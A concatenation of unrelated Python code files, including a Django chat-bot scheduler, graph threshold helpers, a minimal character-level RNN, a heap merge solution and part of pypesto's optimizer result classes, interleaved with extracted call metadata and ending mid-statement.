(['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Author, on_delete=models.CASCADE, default=0)\n', (5533, 5578), False, 'from django.db import models\n'), ((5599, 5665), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (5616, 5665), False, 'from django.db import models\n'), ((5727, 5802), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Document, on_delete=models.CASCADE, default=0, null=True)\n', (5744, 5802), False, 'from django.db import models\n'), ((5817, 5890), 'django.db.models.ForeignKey', 
'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Author, on_delete=models.CASCADE, default=0, null=True)\n', (5834, 5890), False, 'from django.db import models\n'), ((5911, 5988), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(University, on_delete=models.CASCADE, default=0, null=True)\n', (5928, 5988), False, 'from django.db import models\n'), ((6042, 6093), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE'}), '(Author, on_delete=models.CASCADE)\n', (6059, 6093), False, 'from django.db import models\n'), ((6107, 6159), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Subject'], {'on_delete': 'models.CASCADE'}), '(Subject, on_delete=models.CASCADE)\n', (6124, 6159), False, 'from django.db import models\n'), ((6227, 6302), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(Document, on_delete=models.CASCADE, default=0, null=True)\n', (6244, 6302), False, 'from django.db import models\n'), ((6323, 6400), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)', 'null': '(True)'}), '(University, on_delete=models.CASCADE, default=0, null=True)\n', (6340, 6400), False, 'from django.db import models\n'), ((6444, 6476), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (6460, 6476), False, 'from django.db import models\n'), ((6540, 6606), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (6557, 6606), False, 'from django.db import models\n'), ((6624, 6688), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Rankings'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Rankings, on_delete=models.CASCADE, default=0)\n', (6641, 6688), False, 'from django.db import models\n'), ((6700, 6730), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (6719, 6730), False, 'from django.db import models\n'), ((6743, 6787), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (6759, 6787), False, 'from django.db import models\n'), ((6854, 6920), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(University, on_delete=models.CASCADE, default=0)\n', (6871, 6920), False, 'from django.db import models\n'), ((6938, 7002), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Rankings'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Rankings, on_delete=models.CASCADE, default=0)\n', (6955, 7002), False, 'from django.db import models\n'), ((7018, 7062), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (7034, 7062), False, 'from django.db import models\n'), ((7075, 7105), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (7092, 7105), False, 'from django.db import models\n'), ((7158, 7189), 'django.db.models.DateField', 'models.DateField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (7174, 7189), False, 'from django.db import models\n'), 
((7211, 7241), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7230, 7241), False, 'from django.db import models\n'), ((7268, 7298), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7287, 7298), False, 'from django.db import models\n'), ((2782, 2807), 'datetime.date', 'datetime.date', (['(1900)', '(1)', '(1)'], {}), '(1900, 1, 1)\n', (2795, 2807), False, 'import datetime\n')] |
import enum
import datetime
from chat_bots.models import Sender
from slack_bot.bot import SlackBot
from telegram_bot.bot import TelegramBot
class MessengerType(enum.Enum):
Telegram = 'Telegram'
Slack = 'Slack'
class SenderBots:
new_employee_channel_id = None
new_employee_chat_bot = None
access_request_channel_id = None
access_request_chat_bot = None
@staticmethod
def updateBots():
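        # Re-read the configured Sender and rebuild the bots and channel ids for both message types.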
sender = Sender.objects.first()
if sender:
employee_chat_bot = sender.newEmployeeChatBot
access_chat_bot = sender.accessRequestChatBot
SenderBots.new_employee_channel_id = sender.newEmployeeChannelId
SenderBots.access_request_channel_id = sender.accessRequestChannelId
SenderBots.new_employee_chat_bot = SenderBots.createBot(employee_chat_bot)
SenderBots.access_request_chat_bot = SenderBots.createBot(access_chat_bot)
@staticmethod
def createBot(chat_bot):
if chat_bot.botType.messenger_type == MessengerType.Telegram.name:
return TelegramBot(chat_bot.token)
if chat_bot.botType.messenger_type == MessengerType.Slack.name:
return SlackBot(chat_bot.token)
@staticmethod
def getCorrectTime():
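        # Combine today's date with the configured send time; if that time has already passed, schedule for tomorrow instead.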
time = Sender.objects.filter(newEmployeeChannelId=SenderBots.new_employee_channel_id).first().sendTime
now = datetime.datetime.now().time()
date = datetime.date.today()
if time < now:
date = date + datetime.timedelta(days=1)
return datetime.datetime.combine(date, time)
@staticmethod
def sendNewEmployeeMessage(data):
message = f"Новый сотрудник: {data['first_name']} {data['second_name']}. Отдел: {data['department']}," \
f" должность: {data['position']}"
correct_time = SenderBots.getCorrectTime()
SenderBots.new_employee_chat_bot.post_scheduled_message(date=correct_time, message=message,
channel_id=SenderBots.new_employee_channel_id)
@staticmethod
def sendAccessEmployeeMessage(user, services):
message = f"{user.first_name} {user.second_name} запрашивает доступ к следующим сервисам: {', '.join(services)}"
correct_time = SenderBots.getCorrectTime()
        SenderBots.access_request_chat_bot.post_scheduled_message(date=correct_time, message=message,
                                                                   channel_id=SenderBots.access_request_channel_id)
if Sender.objects.first():
SenderBots.updateBots()
| [
"chat_bots.models.Sender.objects.first",
"datetime.date.today",
"datetime.timedelta",
"slack_bot.bot.SlackBot",
"chat_bots.models.Sender.objects.filter",
"telegram_bot.bot.TelegramBot",
"datetime.datetime.combine",
"datetime.datetime.now"
] | [((2521, 2543), 'chat_bots.models.Sender.objects.first', 'Sender.objects.first', ([], {}), '()\n', (2541, 2543), False, 'from chat_bots.models import Sender\n'), ((438, 460), 'chat_bots.models.Sender.objects.first', 'Sender.objects.first', ([], {}), '()\n', (458, 460), False, 'from chat_bots.models import Sender\n'), ((1431, 1452), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1450, 1452), False, 'import datetime\n'), ((1544, 1581), 'datetime.datetime.combine', 'datetime.datetime.combine', (['date', 'time'], {}), '(date, time)\n', (1569, 1581), False, 'import datetime\n'), ((1070, 1097), 'telegram_bot.bot.TelegramBot', 'TelegramBot', (['chat_bot.token'], {}), '(chat_bot.token)\n', (1081, 1097), False, 'from telegram_bot.bot import TelegramBot\n'), ((1190, 1214), 'slack_bot.bot.SlackBot', 'SlackBot', (['chat_bot.token'], {}), '(chat_bot.token)\n', (1198, 1214), False, 'from slack_bot.bot import SlackBot\n'), ((1385, 1408), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1406, 1408), False, 'import datetime\n'), ((1502, 1528), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(1)'}), '(days=1)\n', (1520, 1528), False, 'import datetime\n'), ((1275, 1353), 'chat_bots.models.Sender.objects.filter', 'Sender.objects.filter', ([], {'newEmployeeChannelId': 'SenderBots.new_employee_channel_id'}), '(newEmployeeChannelId=SenderBots.new_employee_channel_id)\n', (1296, 1353), False, 'from chat_bots.models import Sender\n')] |
import math
import random
__BASE_SEED = 1
def constant_thresholds(graph, value):
"""Sets a constant threshold for every node of the graph."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Add a constant attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = value
return thresholds
def degree_proportional_thresholds(graph, fraction=0.5):
"""Sets a threshold for every node of the graph to be proportional to its in-degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Compute the threshold based on the in-degree and add it to every node
for node in graph.Nodes():
degree = node.GetInDeg()
threshold = math.floor(degree * fraction) + 1
thresholds[node.GetId()] = threshold
return thresholds
def random_thresholds(graph, seed):
"""Sets a threshold for every node of the graph to be a random integer between 1 and its degree."""
# Store threshold assignment in a dictionary
thresholds = dict()
# Set the random seed to be able to reproduce results
random.seed(__BASE_SEED + seed)
# Add a random attribute to each node
for node in graph.Nodes():
thresholds[node.GetId()] = random.randint(1, node.GetDeg())
return thresholds
| [
"random.seed",
"math.floor"
] | [((1132, 1163), 'random.seed', 'random.seed', (['(__BASE_SEED + seed)'], {}), '(__BASE_SEED + seed)\n', (1143, 1163), False, 'import random\n'), ((750, 779), 'math.floor', 'math.floor', (['(degree * fraction)'], {}), '(degree * fraction)\n', (760, 779), False, 'import math\n')] |
"""
Minimal character-level Vanilla RNN model. Written by <NAME> (@karpathy)
BSD License
"""
import numpy as np
import unicodedata
import string
import codecs
# data I/O
data = codecs.open('data/potter.txt', 'r', encoding='utf8', errors='ignore').read()
fake = codecs.open('data/output.txt', 'w', encoding='utf8')
chars = list(set(data))
data_size = len(data)  # total number of characters in the training text
vocab_size = len(chars)
print(f'data has {data_size} characters,{vocab_size} unique.') # data has 1109177 characters,80 unique.
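# Lookup tables between characters and integer indices (used for one-hot encoding below).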
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
print(char_to_ix)
print(ix_to_char)
# hyperparameters
hidden_size = 256 # size of hidden layer of neurons
seq_length = 128 # number of steps to unroll the RNN for
learning_rate = 1e-1
# model parameters
W_xh = np.random.randn(hidden_size, vocab_size) * 0.01 # weight: input to hidden
W_hh = np.random.randn(hidden_size, hidden_size) * 0.01 # weight: hidden to hidden
W_hy = np.random.randn(vocab_size, hidden_size) * 0.01 # weight: hidden to output
b_h = np.zeros((hidden_size, 1)) # hidden bias
b_y = np.zeros((vocab_size, 1)) # output bias
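# Forward recurrence used below: h[t] = tanh(W_xh @ x[t] + W_hh @ h[t-1] + b_h), y[t] = W_hy @ h[t] + b_y.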
# 'all_letters' was never defined in the original; the set below is an assumed default
# (ASCII letters plus basic punctuation) so that unicodeToAscii can actually run.
all_letters = string.ascii_letters + " .,;'"
def unicodeToAscii(s):
    return ''.join(
        c for c in unicodedata.normalize('NFD', s)
        if unicodedata.category(c) != 'Mn'
        and c in all_letters
    )
def lossFun(inputs, targets, hprev):
"""
inputs,targets are both list of integers indicating which unique character.
inputs: a seq_length size list
hprev is (H x 1) array of initial hidden state
returns the loss, gradients on model parameters, and last hidden state
"""
xs, hs, ys, ps = {}, {}, {}, {} # sx[t] = ys[t] = ps[t] size = vocab_size x 1
hs[-1] = np.copy(hprev) # hs[t] size = hidden_size * 1
    loss = 0 # xs: input chars, ys: output chars, hs: hidden states, one entry per time step.
    # The weights are reused at every step, but each step keeps its own hidden state.
# forward pass
for t in range(len(inputs)):
xs[t] = np.zeros((vocab_size,1)) # encode in 1-of-k representation
xs[t][inputs[t]] = 1 # inputs[t] is a index number, xs[t] is a vector
hs[t] = np.tanh(np.dot(W_xh, xs[t]) + np.dot(W_hh, hs[t-1]) + b_h) # hidden state
ys[t] = np.dot(W_hy, hs[t]) + b_y # unnormalized log probabilities for next chars
ps[t] = np.exp(ys[t]) / np.sum(np.exp(ys[t])) # (normalized) probabilities for next chars
loss += -np.log(ps[t][targets[t],0]) # softmax (cross-entropy loss)
print(f'loss: {loss}')
# print(f'xs:{len(xs[t])}->{xs[t]}\n hs:{len(hs[t])}->{hs[t]}\n ys:{len(ys[t])}->{ys[t]}\n ps:{len(ps[t])}->{ps[t]}')
# backward pass: compute gradients going backwards
dW_xh = np.zeros_like(W_xh) # gradient of W_xh, same shape as W_xh
dW_hh = np.zeros_like(W_hh) # gradient of W_hh, same shape as W_hh
dW_hy = np.zeros_like(W_hy) # gradient of W_hy, same shape as W_hy
db_h = np.zeros_like(b_h) # gradient of b_h, same shape as b_h
db_y = np.zeros_like(b_y) # gradient of b_y, same shape as b_y
dhnext = np.zeros_like(hs[0])
for t in reversed(range(len(inputs))):
dy = np.copy(ps[t])
dy[targets[t]] -= 1
# backprop into y. see http://cs231n.github.io/neural-networks-case-study/#grad if confused here
dW_hy += np.dot(dy, hs[t].T)
db_y += dy
dh = np.dot(W_hy.T, dy) + dhnext # backprop into h
dhraw = (1 - hs[t] * hs[t]) * dh # backprop through tanh nonlinearity
db_h += dhraw
dW_xh += np.dot(dhraw, xs[t].T)
dW_hh += np.dot(dhraw, hs[t-1].T)
dhnext = np.dot(W_hh.T, dhraw)
for dparam in [dW_xh, dW_hh, dW_hy, db_h, db_y]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
return loss, dW_xh, dW_hh, dW_hy, db_h, db_y, hs[len(inputs)-1]
def sample(h, seed_ix, n):
"""
sample a sequence of integers from the model
h is memory state, seed_ix is seed letter for first time step
i.e. do predictions :)
"""
x = np.zeros((vocab_size, 1))
x[seed_ix] = 1
ixes = []
for t in range(n):
h = np.tanh(np.dot(W_xh, x) + np.dot(W_hh, h) + b_h)
y = np.dot(W_hy, h) + b_y
p = np.exp(y) / np.sum(np.exp(y))
ix = np.random.choice(range(vocab_size), p=p.ravel())
x = np.zeros((vocab_size, 1))
x[ix] = 1
ixes.append(ix)
return ixes
n, p = 0, 0
mW_xh, mW_hh, mW_hy = np.zeros_like(W_xh), np.zeros_like(W_hh), np.zeros_like(W_hy)
mb_h, mb_y = np.zeros_like(b_h), np.zeros_like(b_y) # memory variables for Adagrad
smooth_loss = -np.log(1.0 / vocab_size) * seq_length # loss at iteration 0
while True:
try:
# prepare inputs (we're sweeping from left to right in steps seq_length long)
if p + seq_length + 1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0 # go from start of data
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
# sample from the model now and then
if n % 100 == 0:
sample_ix = sample(hprev, inputs[0], 200)
txt = ''.join(ix_to_char[ix] for ix in sample_ix)
print('----\n %s \n----' % (txt, ))
# forward seq_length characters through the net and fetch gradient
loss, dW_xh, dW_hh, dW_hy, db_h, db_y, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
if n % 100 == 0:
print(f'iter{n}, loss: {smooth_loss}') # print progress
# perform parameter update with Adagrad
for param, dparam, mem in zip([W_xh, W_hh, W_hy, b_h, b_y],
[dW_xh, dW_hh, dW_hy, db_h, db_y],
[mW_xh, mW_hh, mW_hy, mb_h, mb_y]):
mem += dparam * dparam
param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
p += seq_length # move data pointer
n += 1 # iteration counter
except KeyboardInterrupt:
sample_ix = sample(hprev, inputs[0], data_size)
txt = ''.join(ix_to_char[ix] for ix in sample_ix)
fake.write(txt)
break
fake.close() | [
"unicodedata.normalize",
"numpy.zeros_like",
"codecs.open",
"numpy.copy",
"numpy.random.randn",
"numpy.log",
"unicodedata.category",
"numpy.zeros",
"numpy.clip",
"numpy.exp",
"numpy.dot",
"numpy.sqrt"
] | [((263, 315), 'codecs.open', 'codecs.open', (['"""data/output.txt"""', '"""w"""'], {'encoding': '"""utf8"""'}), "('data/output.txt', 'w', encoding='utf8')\n", (274, 315), False, 'import codecs\n'), ((1301, 1327), 'numpy.zeros', 'np.zeros', (['(hidden_size, 1)'], {}), '((hidden_size, 1))\n', (1309, 1327), True, 'import numpy as np\n'), ((1391, 1416), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (1399, 1416), True, 'import numpy as np\n'), ((994, 1034), 'numpy.random.randn', 'np.random.randn', (['hidden_size', 'vocab_size'], {}), '(hidden_size, vocab_size)\n', (1009, 1034), True, 'import numpy as np\n'), ((1096, 1137), 'numpy.random.randn', 'np.random.randn', (['hidden_size', 'hidden_size'], {}), '(hidden_size, hidden_size)\n', (1111, 1137), True, 'import numpy as np\n'), ((1199, 1239), 'numpy.random.randn', 'np.random.randn', (['vocab_size', 'hidden_size'], {}), '(vocab_size, hidden_size)\n', (1214, 1239), True, 'import numpy as np\n'), ((2084, 2098), 'numpy.copy', 'np.copy', (['hprev'], {}), '(hprev)\n', (2091, 2098), True, 'import numpy as np\n'), ((3430, 3449), 'numpy.zeros_like', 'np.zeros_like', (['W_xh'], {}), '(W_xh)\n', (3443, 3449), True, 'import numpy as np\n'), ((3545, 3564), 'numpy.zeros_like', 'np.zeros_like', (['W_hh'], {}), '(W_hh)\n', (3558, 3564), True, 'import numpy as np\n'), ((3660, 3679), 'numpy.zeros_like', 'np.zeros_like', (['W_hy'], {}), '(W_hy)\n', (3673, 3679), True, 'import numpy as np\n'), ((3774, 3792), 'numpy.zeros_like', 'np.zeros_like', (['b_h'], {}), '(b_h)\n', (3787, 3792), True, 'import numpy as np\n'), ((3887, 3905), 'numpy.zeros_like', 'np.zeros_like', (['b_y'], {}), '(b_y)\n', (3900, 3905), True, 'import numpy as np\n'), ((4002, 4022), 'numpy.zeros_like', 'np.zeros_like', (['hs[0]'], {}), '(hs[0])\n', (4015, 4022), True, 'import numpy as np\n'), ((5068, 5093), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (5076, 5093), True, 'import numpy as np\n'), ((5482, 5501), 'numpy.zeros_like', 'np.zeros_like', (['W_xh'], {}), '(W_xh)\n', (5495, 5501), True, 'import numpy as np\n'), ((5503, 5522), 'numpy.zeros_like', 'np.zeros_like', (['W_hh'], {}), '(W_hh)\n', (5516, 5522), True, 'import numpy as np\n'), ((5524, 5543), 'numpy.zeros_like', 'np.zeros_like', (['W_hy'], {}), '(W_hy)\n', (5537, 5543), True, 'import numpy as np\n'), ((5557, 5575), 'numpy.zeros_like', 'np.zeros_like', (['b_h'], {}), '(b_h)\n', (5570, 5575), True, 'import numpy as np\n'), ((5577, 5595), 'numpy.zeros_like', 'np.zeros_like', (['b_y'], {}), '(b_y)\n', (5590, 5595), True, 'import numpy as np\n'), ((179, 248), 'codecs.open', 'codecs.open', (['"""data/potter.txt"""', '"""r"""'], {'encoding': '"""utf8"""', 'errors': '"""ignore"""'}), "('data/potter.txt', 'r', encoding='utf8', errors='ignore')\n", (190, 248), False, 'import codecs\n'), ((2544, 2569), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (2552, 2569), True, 'import numpy as np\n'), ((4080, 4094), 'numpy.copy', 'np.copy', (['ps[t]'], {}), '(ps[t])\n', (4087, 4094), True, 'import numpy as np\n'), ((4245, 4264), 'numpy.dot', 'np.dot', (['dy', 'hs[t].T'], {}), '(dy, hs[t].T)\n', (4251, 4264), True, 'import numpy as np\n'), ((4530, 4552), 'numpy.dot', 'np.dot', (['dhraw', 'xs[t].T'], {}), '(dhraw, xs[t].T)\n', (4536, 4552), True, 'import numpy as np\n'), ((4570, 4596), 'numpy.dot', 'np.dot', (['dhraw', 'hs[t - 1].T'], {}), '(dhraw, hs[t - 1].T)\n', (4576, 4596), True, 'import numpy as np\n'), ((4612, 4633), 'numpy.dot', 'np.dot', (['W_hh.T', 
'dhraw'], {}), '(W_hh.T, dhraw)\n', (4618, 4633), True, 'import numpy as np\n'), ((4696, 4730), 'numpy.clip', 'np.clip', (['dparam', '(-5)', '(5)'], {'out': 'dparam'}), '(dparam, -5, 5, out=dparam)\n', (4703, 4730), True, 'import numpy as np\n'), ((5361, 5386), 'numpy.zeros', 'np.zeros', (['(vocab_size, 1)'], {}), '((vocab_size, 1))\n', (5369, 5386), True, 'import numpy as np\n'), ((5666, 5690), 'numpy.log', 'np.log', (['(1.0 / vocab_size)'], {}), '(1.0 / vocab_size)\n', (5672, 5690), True, 'import numpy as np\n'), ((2870, 2889), 'numpy.dot', 'np.dot', (['W_hy', 'hs[t]'], {}), '(W_hy, hs[t])\n', (2876, 2889), True, 'import numpy as np\n'), ((2994, 3007), 'numpy.exp', 'np.exp', (['ys[t]'], {}), '(ys[t])\n', (3000, 3007), True, 'import numpy as np\n'), ((3115, 3143), 'numpy.log', 'np.log', (['ps[t][targets[t], 0]'], {}), '(ps[t][targets[t], 0])\n', (3121, 3143), True, 'import numpy as np\n'), ((4297, 4315), 'numpy.dot', 'np.dot', (['W_hy.T', 'dy'], {}), '(W_hy.T, dy)\n', (4303, 4315), True, 'import numpy as np\n'), ((5223, 5238), 'numpy.dot', 'np.dot', (['W_hy', 'h'], {}), '(W_hy, h)\n', (5229, 5238), True, 'import numpy as np\n'), ((5257, 5266), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (5263, 5266), True, 'import numpy as np\n'), ((5931, 5957), 'numpy.zeros', 'np.zeros', (['(hidden_size, 1)'], {}), '((hidden_size, 1))\n', (5939, 5957), True, 'import numpy as np\n'), ((1539, 1570), 'unicodedata.normalize', 'unicodedata.normalize', (['"""NFD"""', 's'], {}), "('NFD', s)\n", (1560, 1570), False, 'import unicodedata\n'), ((3017, 3030), 'numpy.exp', 'np.exp', (['ys[t]'], {}), '(ys[t])\n', (3023, 3030), True, 'import numpy as np\n'), ((5276, 5285), 'numpy.exp', 'np.exp', (['y'], {}), '(y)\n', (5282, 5285), True, 'import numpy as np\n'), ((7170, 7190), 'numpy.sqrt', 'np.sqrt', (['(mem + 1e-08)'], {}), '(mem + 1e-08)\n', (7177, 7190), True, 'import numpy as np\n'), ((2787, 2806), 'numpy.dot', 'np.dot', (['W_xh', 'xs[t]'], {}), '(W_xh, xs[t])\n', (2793, 2806), True, 'import numpy as np\n'), ((2809, 2832), 'numpy.dot', 'np.dot', (['W_hh', 'hs[t - 1]'], {}), '(W_hh, hs[t - 1])\n', (2815, 2832), True, 'import numpy as np\n'), ((5170, 5185), 'numpy.dot', 'np.dot', (['W_xh', 'x'], {}), '(W_xh, x)\n', (5176, 5185), True, 'import numpy as np\n'), ((5188, 5203), 'numpy.dot', 'np.dot', (['W_hh', 'h'], {}), '(W_hh, h)\n', (5194, 5203), True, 'import numpy as np\n'), ((1582, 1605), 'unicodedata.category', 'unicodedata.category', (['c'], {}), '(c)\n', (1602, 1605), False, 'import unicodedata\n')] |
import sys
input = sys.stdin.readline
import heapq as hq
# input
t = int(input())
for _ in range(t):
chapter = int(input())
pages = list(map(int, input().split()))
# process
'''
    Chapters may be merged in any order.
    >> Repeatedly pop the two smallest piles from the heap, merge them, and push the sum back.
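    e.g. pages = [40, 30, 30]: merge 30+30 (cost 60), then 60+40 (cost 100) -> total 160.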
'''
sol = 0
hq.heapify(pages)
for _ in range(chapter - 1):
cost = hq.heappop(pages) + hq.heappop(pages)
sol += cost
hq.heappush(pages, cost)
# output
print(sol) | [
"heapq.heappush",
"heapq.heapify",
"heapq.heappop"
] | [((240, 257), 'heapq.heapify', 'hq.heapify', (['pages'], {}), '(pages)\n', (250, 257), True, 'import heapq as hq\n'), ((351, 375), 'heapq.heappush', 'hq.heappush', (['pages', 'cost'], {}), '(pages, cost)\n', (362, 375), True, 'import heapq as hq\n'), ((297, 314), 'heapq.heappop', 'hq.heappop', (['pages'], {}), '(pages)\n', (307, 314), True, 'import heapq as hq\n'), ((317, 334), 'heapq.heappop', 'hq.heappop', (['pages'], {}), '(pages)\n', (327, 334), True, 'import heapq as hq\n')] |
"""Optimization result."""
import warnings
from collections import Counter
from copy import deepcopy
from typing import Sequence, Union
import numpy as np
import pandas as pd
from ..objective import History
from ..problem import Problem
from ..util import assign_clusters, delete_nan_inf
OptimizationResult = Union['OptimizerResult', 'OptimizeResult']
class OptimizerResult(dict):
"""
The result of an optimizer run.
Used as a standardized return value to map from the individual result
objects returned by the employed optimizers to the format understood by
pypesto.
Can be used like a dict.
Attributes
----------
id:
Id of the optimizer run. Usually the start index.
x:
The best found parameters.
fval:
The best found function value, `fun(x)`.
grad:
The gradient at `x`.
hess:
The Hessian at `x`.
res:
The residuals at `x`.
sres:
The residual sensitivities at `x`.
    n_fval:
Number of function evaluations.
n_grad:
Number of gradient evaluations.
n_hess:
Number of Hessian evaluations.
n_res:
Number of residuals evaluations.
n_sres:
Number of residual sensitivity evaluations.
x0:
The starting parameters.
fval0:
The starting function value, `fun(x0)`.
history:
Objective history.
exitflag:
The exitflag of the optimizer.
time:
Execution time.
message: str
Textual comment on the optimization result.
optimizer: str
The optimizer used for optimization.
Notes
-----
Any field not supported by the optimizer is filled with None.
"""
def __init__(
self,
id: str = None,
x: np.ndarray = None,
fval: float = None,
grad: np.ndarray = None,
hess: np.ndarray = None,
res: np.ndarray = None,
sres: np.ndarray = None,
n_fval: int = None,
n_grad: int = None,
n_hess: int = None,
n_res: int = None,
n_sres: int = None,
x0: np.ndarray = None,
fval0: float = None,
history: History = None,
exitflag: int = None,
time: float = None,
message: str = None,
optimizer: str = None,
):
super().__init__()
self.id = id
self.x: np.ndarray = np.array(x) if x is not None else None
self.fval: float = fval
self.grad: np.ndarray = np.array(grad) if grad is not None else None
self.hess: np.ndarray = np.array(hess) if hess is not None else None
self.res: np.ndarray = np.array(res) if res is not None else None
self.sres: np.ndarray = np.array(sres) if sres is not None else None
self.n_fval: int = n_fval
self.n_grad: int = n_grad
self.n_hess: int = n_hess
self.n_res: int = n_res
self.n_sres: int = n_sres
self.x0: np.ndarray = np.array(x0) if x0 is not None else None
self.fval0: float = fval0
self.history: History = history
self.exitflag: int = exitflag
self.time: float = time
self.message: str = message
self.optimizer = optimizer
def __getattr__(self, key):
try:
return self[key]
except KeyError:
raise AttributeError(key)
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def summary(self):
"""Get summary of the object."""
message = (
"### Optimizer Result \n\n"
f"* optimizer used: {self.optimizer} \n"
f"* message: {self.message} \n"
f"* number of evaluations: {self.n_fval} \n"
f"* time taken to optimize: {self.time} \n"
f"* startpoint: {self.x0} \n"
f"* endpoint: {self.x} \n"
)
# add fval, gradient, hessian, res, sres if available
if self.fval is not None:
message += f"* final objective value: {self.fval} \n"
if self.grad is not None:
message += f"* final gradient value: {self.grad} \n"
if self.hess is not None:
message += f"* final hessian value: {self.hess} \n"
if self.res is not None:
message += f"* final residual value: {self.res} \n"
if self.sres is not None:
message += f"* final residual sensitivity: {self.sres} \n"
return message
def update_to_full(self, problem: Problem) -> None:
"""
Update values to full vectors/matrices.
Parameters
----------
problem:
problem which contains info about how to convert to full vectors
or matrices
"""
self.x = problem.get_full_vector(self.x, problem.x_fixed_vals)
self.grad = problem.get_full_vector(self.grad)
self.hess = problem.get_full_matrix(self.hess)
self.x0 = problem.get_full_vector(self.x0, problem.x_fixed_vals)
class OptimizeResult:
"""Result of the :py:func:`pypesto.optimize.minimize` function."""
def __init__(self):
self.list = []
def __deepcopy__(self, memo):
other = OptimizeResult()
other.list = deepcopy(self.list)
return other
def __getattr__(self, key):
"""Define `optimize_result.key`."""
try:
return [res[key] for res in self.list]
except KeyError:
raise AttributeError(key)
def __getitem__(self, index):
"""Define `optimize_result[i]` to access the i-th result."""
try:
return self.list[index]
except IndexError:
raise IndexError(
f"{index} out of range for optimize result of "
f"length {len(self.list)}."
)
def __len__(self):
return len(self.list)
def summary(self):
"""Get summary of the object."""
# perform clustering for better information
clust, clustsize = assign_clusters(delete_nan_inf(self.fval)[1])
counter_message = '\n'.join(
["\tCount\tMessage"]
+ [
f"\t{count}\t{message}"
for message, count in Counter(self.message).most_common()
]
)
times_message = (
f'\n\tMean execution time: {np.mean(self.time)}s\n'
f'\tMaximum execution time: {np.max(self.time)}s,'
f'\tid={self[np.argmax(self.time)].id}\n'
f'\tMinimum execution time: {np.min(self.time)}s,\t'
f'id={self[np.argmin(self.time)].id}'
)
summary = (
"## Optimization Result \n\n"
f"* number of starts: {len(self)} \n"
f"* execution time summary: {times_message}\n"
f"* summary of optimizer messages:\n{counter_message}\n"
f"* best value found (approximately) {clustsize[0]} time(s) \n"
f"* number of plateaus found: "
f"{1 + max(clust) - sum(clustsize == 1)} \n"
f"* best value: {self[0]['fval']}, "
f"worst value: {self[-1]['fval']} \n\n"
f"A summary of the best run:\n\n{self[0].summary()}"
)
return summary
def append(
self,
optimize_result: OptimizationResult,
sort: bool = True,
prefix: str = '',
):
"""
Append an OptimizerResult or an OptimizeResult to the result object.
Parameters
----------
optimize_result:
The result of one or more (local) optimizer run.
sort:
Boolean used so we only sort once when appending an
optimize_result.
prefix:
The IDs for all appended results will be prefixed with this.
"""
current_ids = set(self.id)
if isinstance(optimize_result, OptimizeResult):
new_ids = [
prefix + identifier
for identifier in optimize_result.id
if identifier is not None
]
            # raise if any incoming id clashes with an already existing one
            if not current_ids.isdisjoint(new_ids):
raise ValueError(
"Some id's you want to merge coincide with "
"the existing id's. Please use an "
"appropriate prefix such as 'run_2_'."
)
for optimizer_result in optimize_result.list:
self.append(optimizer_result, sort=False, prefix=prefix)
elif isinstance(optimize_result, OptimizerResult):
# if id is None, append without checking for duplicate ids
if optimize_result.id is None:
self.list.append(optimize_result)
else:
new_id = prefix + optimize_result.id
if new_id in current_ids:
raise ValueError(
"The id you want to merge coincides with "
"the existing id's. Please use an "
